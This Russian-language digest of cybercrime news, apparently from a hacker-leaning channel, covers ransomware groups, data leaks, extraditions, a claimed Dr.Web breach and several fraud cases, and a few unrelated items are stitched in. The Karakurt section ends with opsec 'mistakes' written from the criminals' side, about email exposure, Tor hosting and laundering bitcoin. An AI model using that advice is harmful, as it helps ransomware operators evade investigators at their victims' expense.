Команда обещала восстановить чат к 10:00 29-го октября, но затем выснились
новые детали.
Некоторые
пользователи предположили, что блокировки связаны с «Аукционом пальцев» ),
который ещё в сентябре заявлял о намерении «разобраться» с RGT. Тем не менее,
большинство сообщений об этом удаляются администрацией, а мы, как и большая
часть посвященных уверены в том, что Аукцион не имеет к этому никакого
отношения.
Удар
по RGT со стороны Telegram связан с ужесточением политики платформы.
Любопытно, что за несколько часов до этих событий аналитики отмечали спад
доходов у мошенников , работающих по схеме «Мамонт», на 22% , что
является результатом усилившегося контроля Telegram.
Сейчас сообщается новая информация, в закрытом чате RGT была опубликована
ссылка на Эпилог со следующим содержанием:
Интересный момент заключается в том, что RGT работало в основном по РУ в таких напралвениях, как трейд, эскорт, нарко и т.п. Но они уверяют, что за них взялись правоохранители, получается всё же статистика в боте врёт и данные выдают России и странам СНГ или это стандартный развод?
Против жителя Рязанской области следственное управление регионального УФСБ
возбудило уголовное дело об использовании вредоносных компьютерных программ
(ч. 1 ст. 273 УК РФ). Как сообщает пресс-служба ведомства, он «получал
неправомерный доступ к интернет-ресурсам в целях сбора сведений и персональных
данных».
Хакер использовал специальное программное обеспечение для обхода средств
защиты компьютерной информации. Опубликовано даже фото интерфейса одного из
таких инструментов, который может применяться, например, для взлома камер
видеонаблюдения.
По следам своих неурядиц в конце прошлого года группировка BlackCat повышает
ставки и играет с огнём. Мягко говоря. Злоумышленники
взломали Ultra I&C, американское
дочернее подразделение корпорации Ultra. А это, собственно, британская
оборонка.
По утверждениям BlackCat, они похитили 30 ГБ данных 27 декабря и выложили у себя на сайте. Среди них якобы информация, касающаяся ФБР, НАТО, Швейцарии, Израиля и нескольких оборонных компаний. И, собственно, на днях Минобороны Швейцарии атаку подтвердило — утечка затронула ВВС страны, но пока хакеры опубликовали только коммерческие данные. Значимость взлома ещё предстоит оценить. Но если в недалёком будущем BlackCat и компания начнут резко испытывать серьёзные трудности с продолжением операций и свободой передвижений, то это произойдёт во многом благодаря вот таким выкрутасам.
CA/Browser Forum вводит новые требования к безопасности интернета.
Альянс CA/Browser Forum обновил требования к центрам сертификации (CA) и процессам аудита, а также представил правила выпуска сертификатов для доменов .onion. Изменения направлены на усиление контроля, прозрачности и безопасности инфраструктуры публичных ключей (PKI).
Обязательства и аудит центров сертификации
Согласно новым требованиям, каждый CA обязан:
Если CA выдает сертификаты, которые могут использоваться для выпуска новых сертификатов, они должны быть ограничены технически (в соответствии с пунктами 7.1.2.3–7.1.2.5 требований) или проходить полный аудит. Каждый период выпуска сертификатов должен сопровождаться аудитом, который проводится не реже одного раза в год. При отсутствии актуального отчета об аудите необходимо провести оценку готовности перед началом выпуска сертификатов.
Аудит и квалификация аудиторов
Аудит должен выполняться квалифицированным аудитором, обладающим следующими компетенциями:
CA может выбрать одну из следующих аудиторских схем:
Отчет об аудите должен включать полные данные об организации, сертификационных центрах, используемых сертификатах и применяемых критериях. Он должен быть опубликован в течение трех месяцев после окончания аудиторского периода. Если отчет задерживается, CA обязана опубликовать объяснительное письмо, подписанное аудитором.
CA обязаны проводить самоаудиты как минимум раз в квартал, проверяя случайную выборку сертификатов. С 15 марта 2025 года такие выборки должны проверяться с использованием процесса линтинга для оценки технической точности сертификатов. Аналогичные проверки применяются для сторонних делегатов, которые также обязаны проходить ежегодный аудит.
Сертификаты для доменов .onion
Согласно новым требованиям, сертификаты для доменов .onion должны соответствовать строгим правилам. Домен должен содержать два уровня: «onion» и уникальный адрес версии 3 в соответствии с спецификацией Tor.
CA обязаны проверять владение .onion-доменом следующими методами:
Все подключения должны осуществляться напрямую через протокол Tor, без использования сторонних сервисов вроде Tor2Web. Еще один вариант проверки – подписание запроса на сертификат приватным ключом скрытого сервиса, что подтверждается специальными значениями nonce с высокой энтропией.
CA не имеют права выпускать wildcard-сертификаты для доменов .onion, если это не предусмотрено отдельными процедурами в правилах. CA также подчеркивает, что сертификаты для доменов .onion не будут считаться внутренними именами при условии, что они соответствуют новым требованиям. Это изменение направлено на повышение доверия и улучшение безопасности в экосистеме Tor.
Юридические и финансовые обязательства
CA несет полную ответственность за выполнение своих обязанностей и соблюдение всех требований, включая обязательства делегированных сторон. В случае нарушений CA обязаны компенсировать потери пользователям и поставщикам приложений.
Каждая CA должна уведомлять форум CA/Browser Forum о любых изменениях в политике сертификации и обеспечивать соблюдение законодательства во всех юрисдикциях, где они работают. При необходимости изменения в требованиях должны быть минимальными и временными до устранения конфликта с местным законодательством.
Обновление требований и законодательное соответствие
Центры сертификации обязаны следовать местному законодательству в каждой юрисдикции, где они работают. В случае конфликта между местным законом и требованиями CA/Browser Forum, CA может вносить минимальные изменения в политику до устранения несоответствий.
Изменения в политике должны быть зафиксированы в публичных документах и направлены на согласование с CA/Browser Forum. При изменении законодательства или правил CA обязаны обновить свои политики в течение 90 дней.
Изменения направлены на повышение безопасности и прозрачности инфраструктуры публичных ключей и обеспечение доверия к сертификационным центрам, особенно в контексте выпуска сертификатов для доменов .onion.
github.com/cabforum/servercert/blob/Reduce-Max-Validity-and-Data-Reuse- Periods-Over-Time/docs/BR.md#7-certificate-crl-and-ocsp-profiles
Узбекистанец Никита Склюев экстрадирован из Украины в США в связи с обвинением в краже миллионов долларов в криптовалюте.
Как сообщает Департамент юстиции, 26 июня Никита Андреевич Склюев, он же Валерий Дорожкин, 37 лет, из Узбекистана, ранее экстрадированный из Украины, привлечен к суду по обвинению в мошенничестве с использованием электронных средств связи и мошенническом использовании устройств несанкционированного доступа.
В случае доказательства вины ему грозит до 20 лет тюремного заключения и штраф в размере 250 000 долларов.
Согласно обвинительному заключению, в июне 2018 года для продажи через Apple App Store Склюев представил программное приложение «EOSIO Wallet Explorer», которое якобы представляло собой криптовалютный кошелек, но на самом деле это было вредоносное программное обеспечение для кражи закрытого ключа пользователя криптовалюты.
В сентябре 2018 года гражданин Западного округа Нью-Йорка (жертва) приобрел приложение EOSIO Wallet Explorer и установил его на свой iPhone. После введения жертвой своего закрытого ключа Склюев получил нелегальный доступ к криптовалютному кошельку Жертвы, в котором содержалось примерно 2 092 395,5356 криптовалют EOS, стоимость которых на тот момент оценивалась примерно в 11,8 миллиона долларов США.
Чуть позднее Склюев изменил ключ к кошельку жертвы, а в феврале 2019 года он перевел криптовалюту EOS с ее кошелька на множество других онлайн-кошельков, находившихся под его контролем.
Расследование ведет ФБР, обвинение последовало за успешной экстрадицией Склюева из Украины 20 июня 2024 года. Управление международных отношений Департамента юстиции сотрудничало с румынскими и украинскими властями, чтобы добиться его ареста и экстрадиции.
• Source: https://www.justice[.]gov/usao-wdny/pr/uzbekistan-man-extradited- ukraine-and-arraigned-charges-stealing-millions-dollars
Хакер USDoD раскрыл свою личность и заявил, что он является 33-летним Луаном Г. из штата Минас-Жерайс в Бразилии. USDoD (EquationCorp) известен утечкой данных National Public Data (NPD) и публикации в интернете более 3,2 миллиарда номеров социального страхования.
В ходе интервью с Hackread хакер подтвердил, что его личность раскрыла CrowdStrike. Напомним, что в июле USDoD объявил о краже полного внутреннего перечня угроз из базы данных CrowdStrike. Менее чем через месяц CrowdStrike удалось сдеанонить хакера.
USDoD также причастен ко взлому платформы безопасности ФБР InfraGard, в результате чего были раскрыты личные данные 87 000 пользователей. Помимо этого, хакер участвовал в других крупных утечках данных и инцидентах.
Сам USDoD заявил о намерении изменить свою жизнь и покончить с киберпреступлениями, чтобы «сделать что-то положительное для Бразилии». Хакер признал, что пришло время взять ответственность за свои действия:
«Поздравляю CrowdStrike с тем, что они меня раскрыли, хотя это уже сделали intel421 Plus и несколько других компаний еще до взлома InfraGard. Хочу сказать спасибо, пора признать, что я проиграл, и пора выйти из игры. Да, это говорит Луан. Я не буду бежать, я в Бразилии, в том же городе, где родился. Я ценный объект, и, возможно, скоро поговорю с теми, кто за это отвечает, но все узнают, что за псевдонимом USDoD стоит обычный человек. Я не могу жить двойной жизнью, и пришло время взять ответственность за свои действия, как бы дорого это мне ни обошлось».
Click to expand...
Отраслевые эксперты выразили сомнения в искренности намерений хакера покончить с преступной деятельностью. По мнению специалистов, если бы хакер действительно хотел начать новую жизнь, он мог бы сдаться в ближайшем посольстве, заключить выгодную сделку с правосудием и спустя несколько лет стать уважаемым ИБ-специалистом. Также предполагается, что данное интервью может быть частью стратегии по дезинформации, направленной на отвлечение внимания от недавних атак.
CrowdStrike рассказала о своей работе в отчете, полученном порталом TecMundo от анонимного источника. В распоряжении специалистов оказались налоговые документы Луана, электронные адреса, зарегистрированные домены, IP-адреса, аккаунты в социальных сетях, номер телефона и информация о городе проживания. Однако более точные данные не раскрываются во избежание полной утечки личности преступника.
Луан Б.Г. имеет долгую историю в области хактивизма, начавшуюся ещё в 2017 году, а позже его деятельность перешла в более серьёзную стадию киберпреступности. Следователи смогли идентифицировать Луана благодаря использованию им одного и того же email-адреса для регистрации на разных форумах и соцсетях, что дало возможность отследить его деятельность с 2017 по 2022 год. Этот же адрес использовался для создания аккаунтов на GitHub и регистрации доменов, связанных с проектами по разработке кибероружия. На основе собарнных данных были найдены и другие профили в соцсетях.
Профиль Луана в соцсети
Интересно, что Луан Б.Г. не скрывал своей личности и даже дал интервью в 2023 году, где заявил о наличии двойного гражданства — бразильского и португальского, а также упомянул, что проживает в Испании. Однако позже Луан утверждал, что все данные о его личности, представленные в публичном доступе, являются дезинформацией.
Кроме того, утечка на форуме BreachForums в июле 2024 года, когда были раскрыты IP-адреса пользователей, помогла выяснить, что Луан использовал динамические IPv4 и несколько IPv6, принадлежащих бразильскому интернет- провайдеру в Минас-Жерайс.
Сейчас все собранные данные переданы соответствующим органам. CrowdStrike продолжает отслеживать активность USDoD, так как группа продолжает заниматься кибершпионажем и шантажом, выставляя украденные данные на продажу.
По мнению экспертов, публикация информации о личности Луана вряд ли повлияет на его деятельность в краткосрочной перспективе, так как он, скорее всего, будет отрицать свою причастность или заявит, что намеренно ввел исследователей в заблуждение. Исследователи подчеркивают, что стремление Луана к признанию в хактивистских и киберпреступных сообществах, скорее всего, означает, что он не собирается прекращать свою деятельность в ближайшее время.
Раскрытие личности хакера USDoD как гражданина Бразилии имеет значительные последствия, учитывая его участие в высокопрофильных утечках данных. В соответствии с договором о выдаче преступников между США и Бразилией, американские власти могут запросить экстрадицию для привлечения его к ответственности за киберпреступления. Однако, Бразилия часто не выдает своих граждан, что может осложнить усилия по привлечению хакера к суду в США. В случае отказа в экстрадиции, хакер все равно может понести наказание в соответствии с бразильским законодательством о киберпреступлениях.
Намерение Луана Г. изменить свою жизнь и внести положительный вклад в развитие Бразилии также может повлиять на подход властей к его делу, возможно, сосредоточив внимание на реабилитации, а не на суровом наказании.
По телеграмму началось разлетаться сообщение от бота Dr.web :
Нами была взломана инфраструктура Dr.Web — компании, которая долгое время считалась одним из топов кибербезопасности. Иронично? Более чем.
Мы проникли в локальную сеть, изначально спланировав всё. После этого началась планомерная работа — шаг за шагом продвигались глубже, взламывая сервер за сервером, ресурс за ресурсом. Уже за несколько дней мы проникли в самые защищенные части инфраструктуры.
Нам удалось взломать и выгрузить сервер корпоративного GitLab, где хранились внутренние разработки и проекты, сервер корпоративной почты, Confluence, Redmine, Jenkins, Mantis, RocketChat — системы, где велась разработка и обсуждались задачи. Все проекты по улучшению безопасности теперь, кажется, нуждаются в защите сами по себе. Не оставили без внимания и ресурсы по управлению ПО.
Клиентские базы данных. Да, данные пользователей, которые доверяли Dr.Web свою безопасность, мы так-же выгрузили. Вишенка на торте — домен контроллер. Овладев им, нам оставалось лишь пополнять наши накопители, выгружая все больше данных.
Общий объем полученных данных составил около 10 терабайт. Однако самое примечательное — это то, что мы оставались незамеченными на протяжении целого месяца. В то время как "ИБ гигант" продолжал продавать свои продукты и говорить о важности защиты данных, расписывая сказки об "своевременно пресечённой (https://t.me/DrWeb_antivirus/3619)" попытке навредить инфраструктуре.
Ожидайте интересных новостей. У нас много российских данных, продолжаем работать над более крупными целями.
По информации иностранных СМИ, власти Китая планируют в рамках экспериментального проекта присвоить всем пользователям интернета индивидуальные глобальные ID, чтобы деанонимизировать их действия в сети и защитить от утечек персональных данных.
Основной целью новой системы глобального ID в Китае является борьба с анонимностью в интернете, которая, по мнению китайского правительства, способствует распространению дезинформации, мошенничества и киберпреступности. Также проект призван повысить уровень ответственности пользователей и укрепить общественный порядок в стране.
Тестирование глобального ID в Китае на первом этапе будет добровольным. Предложение по этому проекту открыты для общественного обсуждения до конца августа.
Предполагается, что на законодательном уровне в Китае все интернет-платформы будут обязаны проверять личность пользователей при регистрации и связывать их аккаунты с уникальными идентификационными номерами, выданными государственными органами страны.
«Проект национального ID для интернета сократит чрезмерный сбор и хранение личной информации граждан интернет-платформами на основании государственного идентификатора», — заявили СМИ представители регуляторных ведомств в Китае.
Профильные эксперты пояснили СМИ, что в Китае много лет жёстко контролируется информация и следят за поведением пользователей в интернете. Например, социальные сети Weibo, Xiaohongshu и Douyin проверяют аккаунты и показывают местоположение пользователей в их постах. Контроль за пользователями был не полным, а для полного отслеживания действий граждан как раз и предлагается учитывать данные с разных онлайн-платформ. Внедрение единого ID в интернете сделает мониторинг действий пользователей централизованным.
В рамках обсуждения инициативы властей Китая пользователями высказываются опасения по поводу потенциальных нарушений конфиденциальности и свободы слова. Люди боятся, что единая система ID приведёт к усилению государственного контроля над интернетом и ограничению доступа к информации. С другой стороны, сторонники системы единого ID в интернете заявляют, что проект поможет улучшить безопасность в сети и ограничит сбор ненужных личных данных различными приложениями и сервисами.
«С глобальным ID в интернете каждый ваш шаг в сети, все ваши цифровые следы будут контролироваться регуляторами. Это определённо повлияет на поведение пользователей и их жизнь», — считает доцент журналистики университета Hong Kong Baptist University Роуз Лукью.
Профессор права, Шэнь Куй (Shen Kui) из Пекинского университета, в своем комментарии отметил, что централизованный интернет-ID может вызвать у людей страх перед использованием интернета.
«Потенциальные риски и вред от единого ID в интернете огромны. Этот проект может вызвать у людей страх перед использованием интернета», — сообщил СМИ профессор права Шэнь Куй из Пекинского университета в рамках обсуждения проекта.
В Александрии завершилась 36-я Международная олимпиада по информатике. Ее участниками стали 94 страны. В их числе: Китай, США, Израиль, Япония, Иран и другие. Каждая страна представила команды в составе четырех человек. Все российские школьники вернулись домой с золотыми медали. Это лучший результат 36-й Международной олимпиады по информатике.
Медалистов, добившихся убедительной победы, поздравил заместитель Председателя Правительства Российской Федерации Дмитрий Чернышенко. «Четыре золота – это впечатляющий результат, который говорит о ваших исключительных способностях и усердии. Желаю вам дальнейших успехов и высоких достижений на пути к технологическому лидерству России. Правительство в свою очередь продолжит создавать условия для реализации потенциала каждого, как и поручил Президент Владимир Путин», – сказал вице премьер.
Победителей поздравил Министр просвещения Сергей Кравцов, отметивший блестящий результат. «Сегодня мы активно укрепляем технологический суверенитет России, и большую роль в этом играют именно учителя, которые помогают выявлять и развивать способности и таланты каждого ребенка. Уверен, школьники, интересующиеся информатикой, в будущем внесут значимый вклад в развитие передовых информационных технологий в различных сферах. Мы гордимся нашими ребятами, их обязательно ждут впереди и другие серьезные победы», – подчеркнул глава ведомства.
Как сообщили в Правительстве РФ, подготовкой российской команды школьников занимался тренерский штаб, руководители которого являются преподавателями МФТИ, ИТМО, НИУ ВШЭ. Трое из четырех ребят помимо этого проходили обучение на курсе на курсе олимпиадного программирования от «Яндекса». В состав команды- победительницы вошли:
• Гимран Абдулин (лицей-интернат № 2, г. Казань),
• Дарья Грекова (школа № 57, г. Москва),
• Петр Лосев (школа № 57, г. Москва),
• Иван Пискарев (школа № 2086, г. Москва).
Руководителем тренерского штаба является директор Высшей школы программной инженерии Московского физико-технического института Алексей Малеев. Ведущие тренеры – доцент факультета информационных технологий и программирования Национального исследовательского университета ИТМО Андрей Станкевич, преподаватель факультета компьютерных наук Высшей школы экономики Иван Сафонов, магистр ФКН НИУ ВШЭ, бронзовый медалист ICPC Филипп Грибов.
Стоит отметить, что впервые Международная олимпиада по информатике прошла в 1989 году. В 2023-м все участники российской команды тоже получили золотые награды. Годом ранее российские школьники заняли первые места на Международной олимпиаде по информатике, прошедшей в Индонезии.
Средний IQ дамочки составил 178 — это выше, чем у 98% населения планеты. Однажды, во время учёбы в Оксфорде, она взяла отпуск, решив подработать танцовщицей в стрип-баре и её осенило — в этой сфере можно стать богатой и счастливой.
Десятилетия она проработала в секс-индустрии, а теперь ни в чём себе не отказывает, путешествует по миру, участвует в секс-вечеринках и зарабатывает миллионы.
В Испании арестовали и экстрадировали в США Максима Сильникова, которого обвиняют в создании кампании по распространению программы-вымогателя Ransom Cartel и в организации масштабной схемы вредоносной рекламы, которая функционировала с 2013 по 2022 год.
38-летний Максим Сильников, известный под псевдонимами «J.P. Morgan», «xxx» и «lansky» на хакерских форумах, привлекал внимание спецслужб благодаря своей причастности к крупным кибератакам. По данным спецслужб Великобритании, Сильников и его сообщники — элитные киберпреступники, которые применяли строгие меры по обеспечению собственной безопасности в сети, чтобы избежать поимки.
В рамках последнего дела Сильникова обвиняют в создании и управлении схемой «программа-вымогатель как услуга» (Ransomware-as-a-Service, RaaS), которая активно использовалась для атак на компании и частных лиц. Важную роль Сильникова играли переговоры с брокерами начального доступа (Initial Access Broker, IAB), которые предоставляли доступ к скомпрометированным корпоративным сетям, а также управление коммуникациями с жертвами и обработку выкупов. Сильников занимался отмыванием денег от выкупов через криптовалютные миксеры, чтобы скрыть следы финансовых операций и затруднить работу правоохранительных органов.
Кроме того, Сильников был ответственен за создание Reveton — трояна, который блокировал доступ к Windows и требовал выкуп за разблокировку. Вредоносная программа выдавала себя за инструмент правоохранительных органов. Троян блокировал компьютер под предлогом обнаружения детской порнографии и материалов, защищенных авторским правом. С момента своего запуска в 2011 году по 2014 год Reveton ежедневно приносил различным киберпреступникам около $400 000.
Деятельность Сильникова в сфере малвертайзинга (с октября 2013 года по март 2022 года) также оказалась масштабной и разрушительной. Задача Сильникова заключалась в разработке и распространении вредоносной рекламы, которая казалась безобидной, но на самом деле перенаправляла пользователей на сайты с вирусами и вредоносными программами.
В кампании малвертайзинга использовались следующие инструменты:
• Angler Exploit Kit (AEK): разработан для эксплуатации уязвимостей в веб-
браузерах и установленных в них плагинах с целью доставки дополнительных
полезных нагрузок на взломанные устройства.
• Вредоносное ПО Locker: «облегченная» программа-вымогатель, которая не дает
жертве получить доступ к своим данным, часто требуя плату за восстановление
доступа.
• Scareware: закидывают компьютер жертвы поддельными оповещениями, побуждая
пользователя загружать вредоносное ПО или предоставлять личную информацию
киберпреступникам.
На пике своей деятельности Angler Exploit Kit составлял 40% всех заражений эксплойтами в мире и приносил преступникам около $34 миллионов в год. Жертвами атак стали более 500 млн. пользователей по всему миру.
Сильников также участвовал в разработке и обслуживании технической инфраструктуры, системы распределения трафика (TDS), для более эффективного управления и выявления вредоносных кампаний.
В ходе международной операции сотрудники NCA вместе с коллегами из Украины, Португалии и Сингапура провели обыски, изъяли более 50 терабайт данных и установили инфраструктуру, использованную для управления программами- вымогателями. Собранные данные будут использованы для дальнейших расследований и привлечения к ответственности других участников преступной группы.
Максиму Сильникову грозит наказание за мошенничество, компьютерные преступления, кражу личных данных и другие преступления. В случае признания виновным по всем пунктам обвинения, Сильникову может грозить до 100 лет тюремного заключения, хотя реальный срок, скорее всего, будет меньше из-за возможности одновременного отбывания нескольких наказаний.
Операция Ransom Cartel, запущенная в декабре 2021 года, имеет множество сходств с кодом группировки REvil. О подозрительной связи Ransom Cartel и REvil заявили специалисты Palo Alto Networks. По данным исследования, Ransom Cartel начала свою деятельность всего через 2 месяца после развала REvil. Тогда эксперты отметили, что у операторов Ransom Cartel есть доступ к исходному коду шифровальщика REvil, но они не имеют в своем арсенале механизм обфускации, который используется для шифрования строк и скрытия вызовов API.
В 2019 году участник киберпреступной группировки, занимавшейся распространением вымогательского ПО Reveton был приговорен в Великобритании к 6 годам лишения свободы и штрафу в размере $355 000. По данным следствия, 25-летний студент в течение 6 лет был связан с нашумевшей группировкой Lurk.
• Source: https://www.justice[.]gov/opa/media/1363391/dl?inline
• Source: https://www.justice[.]gov/opa/media/1363386/dl?inline
• Source: https://www.nationalcrimeagency.gov[.]uk/news/suspected-head-of- prolific-cybercrime-groups-arrested-and-extradited
Главное из расследования RTVI.
Журналисты RTVI выпустили расследование о никому не известной компании ООО «Банкнота», которая по итогам 2023 года отчиталась о выручке в 3,7 триллиона рублей и чистой прибыли в 3,4 триллиона рублей. Если верить этим показателям, она вошла в тройку крупнейших компаний России, опередив «Лукойл», «Сбер», Wildberries и уступив лишь «Роснефти» и «Газпрому».
По подсчетам RTVI, чистая прибыль «Банкноты» — это 8,5% бюджета России, или 22% всего рынка розничного кредитования страны за отчетный период. «Появившись из ниоткуда, „Банкнота“ исчезла спустя год своего существования. По состоянию на август 2024 года физических следов „Банкноты“, за исключением вывески, нет», — пишут авторы расследования.
Офис компании находился по адресу регистрации юридического лица ООО «Банкнота» — в торговом центре Metromall на Дмитровском шоссе в Москве. На сайте фирмы, который сейчас доступен лишь в виде копии в архиве, утверждалось, что она занимается ипотечным кредитованием, автокредитами и займами под проценты для бизнеса. В рекламных сообщениях компания называла себя «Банк Нота», хотя не могла использовать слово «банк» в названии, поскольку у нее не было лицензии Банка России. В рекламе компания делала акцент на том, что предлагает оформление ипотеки людям с плохой кредитной историей и просрочками.
Согласно Единому государственному реестру юридических лиц (ЕГРЮЛ), единственный владелец ООО «Банкнота» — москвич 1975 года рождения Дмитрий Фролов. При этом в реестре отмечено, что сведения о владельце «признаны недостоверными ФНС».
Страница Дмитрия Фролова во ВКонтакте.
Как выяснили авторы RTVI, Фролов, также известный как Фрол Вертун, был неоднократно судим — в основном, за мелкие кражи, в том числе колбасы и водки в магазинах. Последний приговор ему вынесли в 2022 году, а летом 2023-го на его имя с разницей в несколько дней зарегистрировали пять компаний, включая ООО «Банкнота». Журналисты и брат Фролова считают, что на момент регистрации компаний он находился в колонии. Брат Фролова также усомнился, что тот создал какую-либо компанию. По его словам, он мог «просто черкануть бумажку» и «получить какой-то процент» за это. Фролова, сообщил родственник, искали не только журналисты, но и налоговая.
С самим Фроловым авторам RTVI поговорить не удалось. Как им стало известно, в мае 2024 года он подал в Федеральную налоговую службу заявление о том, что не является ни учредителем, ни председателем правления ООО «Банкнота».
С компанией, выяснили журналисты, связан еще один человек — люди, действовавшие от имени «Банкноты», иногда указывали для связи 23-летнего Данилу Романова. В 2018 году человека с тем же именем полиция разыскивала по заявлению дежурного социального приюта для детей и подростков. Сообщалось, что Романов сбежал из приюта вместе с другим воспитанником. В последние годы, пишет RTVI со ссылкой на данные ФНС, Романов был частым клиентом микрофинансовых организаций, в отношении него открыты несколько исполнительных производств.
В марте 2022 года Романов стал учредителем аудиторской фирмы ООО АФ «Артур Андерсен Рус», которая в декабре 2023-го была закрыта решением ФНС из-за недостоверных сведений о ней. За восемь месяцев до этого суд отправил самого Романова под домашний арест по делу о мошенничестве (часть 4 статьи 159 УК). Через несколько месяцев он сбежал.
Кто настоящие владельцы «Банкноты» и как именно компания заработала триллионы — неизвестно. Опрошенные RTVI эксперты отметили, что такую прибыль невозможно получить на ипотеке и автокредитовании или занимаясь брокерской деятельностью. Руководитель корпоративной и налоговой практики юридической компании «Интерцессия» Ирина Егорова в беседе с журналистами предположила, что если финансовый отчет «Банкноты» настоящий, то, вероятно, в нем отображено «движение финансовых активов, таких как вексели или схожие инструменты».
RTVI отмечает, что при этом назвать компанию нарисованной на бумаге нельзя — у нее был офис, где работали люди. Кроме того, в ноябре 2023 года «Банкнота» получила час консультаций от Московского экспортного центра (АНО МЭЦ) в рамках государственной поддержки.
В декабре 2023 «Банкнота» сообщила ФНС, что у нее есть филиал в Беларуси. Однако в белорусских сервисах по проверке контрагентов информации об этом филиале нет. Существует ли он на самом деле, неясно.
Опрошенные RTVI эксперты считают, что компания могла заниматься выводом денег за рубеж, если у нее был белорусский канал. «Скорее всего, перевели все в Беларусь, потому что там у „Банкноты“ есть дочерняя компания. А если эта компания „черная“, то там плохо просматривается перевод денежных средств. И дальше либо они остались в Беларуси, либо уже ушли за рубеж на подставные компании», — сказал журналистам собеседник, «знакомый со специфическими особенностями работы российских финансовых компаний».
Московский офис «Банкноты» в торговом центре Metromall закрыт. Счета компании заблокированы ФНС. В мае 2024 года Бутырский суд Москвы зарегистрировал первый иск к «Банкноте». Некий Игорь Гольдштейн попросил суд аннулировать договор купли-продажи своей квартиры, заключенный между компанией и неким Алексеем Решетняком. Первое заседание назначено на 12 сентября.
rtvi.com/stories/samaya-pribylnaya-kompaniya-rossii-o-kotoroj-vy-nikogda-ne-
slyshali
web.archive.org/web/20240401000000*/thebanknota.ru
Несколько часов назад певица Лариса Долина подтвердила, что стала жертвой мошенников. Махинации с квартирой артистки лишили ее изрядной суммы денег.
Новостные ленты пестрят новостями о неприятностях на крупную сумму, с которыми столкнулась 68-летняя певица Лариса Долина. Ни жизненный опыт, ни многочисленные помощники не уберегли знаменитость от мошенников, который буквально «развели» звезду на почти 200 миллионов рублей.
Как сообщает телеграм-канал, артистка продала квартиру площадью 236 кв.м. в центре столицы за 112 млн рублей. Сделку регистрировала одна из компаний. Оказалось, что разводить Ларису Александровну начали еще с апреля: ей позвонили «спецслужбы» с самыми благими намерениями. Сказали, что квартира под угрозой мошенников, и убедили Долину фиктивно продать недвижимость и отправить деньги на безопасный счет. За это время у артистки выманили около 68 млн сбережений.
Квартиру продали абсолютно ничего не подозревающим людям. Долина деньги получила и отдала их на якобы безопасные счета мошенникам. Ключи новоиспеченным хозяевам певица передать не успела, вовремя спохватилась и обратилась в соответствующие органы. Новых собственников квартиры на порог не пустили, звезда отказывается отдавать ключи, хотя она уже не собственник.
Несколько часов назад Лариса Александровна подтвердила, что на ее квартиру наложен арест, следствие ведется. Преступники разработали изощренную схему заранее, в отличие от мужчины, который недавно пытался похитить пятимесячного ребенка прямо из рук матери.
Официально:
https://storage.courtlistener.com/recap/gov.uscourts.ohsd.295290/gov.uscourts.ohsd.295290.4.0.pdf
Новость: <https://therecord.media/us-charges-alleged-karakurt-ransomware-
member>
Кратко:
- Денис Золотарев, 33-летний гражданин Латвии, проживающий в Москве был
арестован в декабре 2023 в Грузии и экстрадирован в США в этом месяце
- в рокетчате Каракурта был известен как "Sforza_cesarini "
- участвовал как минимум в 6 атаках на компании США
- роль в группе - осинтер на "холодных кейсах" - прозванивал, вел переговоры
и благополучно вытаскивал выкупы
Косяки:
Я бы не жертвовал инбоксом ради прайваси - с Гугла слишком просто вытаскивать информацию для них (вплоть до кросс-логинов в другие сервисы через мета-дату).
Судя по всему, у ФБР есть рабочие методики для установления реального айпи- адреса тор-сервиса. Это не говорит о том, что не нужно использовать Тор, но возможно стоит закладывать риск того, что сервер будет установлен и хостеру придут запросы. Скорее всего хостер был в той стране, откуда ФБР не представляет труда получить информацию.
Доступ к чату ФБР имели еще до того, как получили содержимое серверов - через участника чата, кто им сливал логи.
В рокетчате опять трепались обо всем подряд на радость американцам - в том числе подтверждая связь между своими брендами.
Шел 2022, а пацаны продолжали отмывать биткойн на личные кошельки, открытые к тому же на криптобиржах, к которым у американцев есть полный контроль.
Делаем вывод, что у ЮССС есть база Гарантекса, а у ФБР Bitcoin24.pro.
У некоторых людей существует вредный стереотип, что якобы Эппл защищает их данные и не сотрудничает толком с правоохранительными органами (или отдает минимум информации). Вот конкретный пример - когда отдали не только регистрационные данные, включая телефон, но и айпи-адреса за (!) 3 года.
"The FBI requested investigative assistance from Swiss law enforcement for
records associated withanonymoux@proton.me,
and in response, Swiss law enforcement provided records indicating the email
address was registered on October 17, 2023 at approximately 11:28 AM UTC from
an IP address (“IP-1”).
20. I conductedlink analysis of IM ID-1, IM ID-2, IM
ID-3,anonymoux@proton.me,
and dennis.zolotaryov@icloud.com.
From that link analysis, I learned the following:
a. IM ID-1, associated with Karakurt Rocket.Chat user Sforza, was accessed
by the
same IP addresses at or about the same times, on multiple occasions, as those
used
to access
dennis.zolotarjov@icloud.com.
b. IM ID-1 was accessed by the same IP addresses at the same times , on
multiple
occasions, as those used to access IM ID-2.
c. IM ID-2 was accessed by the same IP addresses at the same times , on
multiple
occasions, as those used to accessed IM ID-3.
d. On at least one occasion, the same IP address was used to access IM ID-1,
IM ID-
2, and IM ID-3 on the same day.
e. IP-1, which was used to
registeranonymoux@proton.me on October 17, 2023
at
approximately 11:28 UTC, was used to access both IM ID-2 and IM ID-3 on
October 17, 2023 at approximately 11:30 UTC"
Кому лень читать английский - кратко - Золотарев связался с инфосек- журналистом и предложил опубликовать слив жертвы или связаться с ней, чтобы его подтвердить (для того, чтобы додавить на переговорах), журналист отказался и (неожиданно!) слил все ФБР, включая ящик протона, с которого связывался аноним. У Золотарева был ужасный ОпСек и с помощью мета-даты уже собранной между его аккаунтами - судье доказывают, что он распоряжался ими всеми.
"The individual provided screenshots of the Karakurt Rocket.Chat panel the FBI previously seized in the above-referenced search warrants located at the Rocket.Chat Tor URL. The screenshot of the Rocket.Chat panel provided by the individual showed the individual was logged in as a username with an avatar represented by a large, uppercase, white font “S” in a brown box. Only one user on the seized Rocket.Chat had the same avatar, Sforza_cesarini, indicating the individual was almost certainly logged in as Sforza_cesarini at the time of taking the screenshot. The individual requested approximately $365,000 in Bitcoin from the FBI in exchange for sharing additional information on the group. "
Я даже не знаю, как это комментировать: когда ФБР связались с Золотаревым - он прикинулся инфосек-ресерчером и предложил слить информацию на Каракурт - дал базовые данные, показал скриншот чата (где спалил свой же никнейм) и просил за больше информации - 365к баксов (похоже, что карма настигла).
Вот такие вот приключения Дениски, малята.
Робот-стоматолог, управляемый ИИ, провёл первую в мире процедуру на человеке
Начальная специализация аппарата — подготовка зуба под коронку. После подробного ОКТ-сканирования полости рта робот приступает к работе — самостоятельно сверлит зубы и выполняет сопутствующие работы.
По словам представителей компании, машина работает точно, безболезненно и в 8 раз быстрее человека-стоматолога.
